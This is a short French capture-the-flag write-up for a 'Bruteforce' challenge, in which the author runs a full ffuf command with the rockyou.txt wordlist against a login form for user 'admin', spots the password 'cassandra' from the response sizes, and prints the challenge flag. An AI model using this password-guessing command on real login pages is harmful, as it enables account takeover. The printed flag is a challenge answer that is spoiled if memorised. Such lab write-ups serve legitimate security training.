Bruteforce

Consignes

Utilisez "rockyou.txt" !

Réalisation

J'ai utilisé ffuf pour réaliser le bruteforce. Je suis parti du principe que le user était "admin". J'ai donc fais un bruteforce sur le mdp avec Rockyou.

Voici la commande avec laquelle j'ai réalisé le bruteforce:

ffuf -w /usr/share/wordlists/rockyou.txt -u http://LienVersLeCTF/login -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -fc 401,403

Ceci m'a retourné alors chacun des tests réalisés. Parmi ces tests, une ligne s'est démarquée:

panther [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 18ms] dinamo [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 18ms] mommy [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 23ms] juliana [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 19ms] trustno1 [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 22ms] cassandra [Status: 200, Size: 78, Words: 6, Lines: 1, Duration: 23ms] sexylady [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 20ms] autumn [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 21ms] 14344 [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 21ms] mendoza [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 17ms]

Je me connecte donc sur le site en tant que admin:cassandra

Une fois connecté, nous obtenons le FLAG :

2600{rJW_h000m2kUi0q9u-X9GA}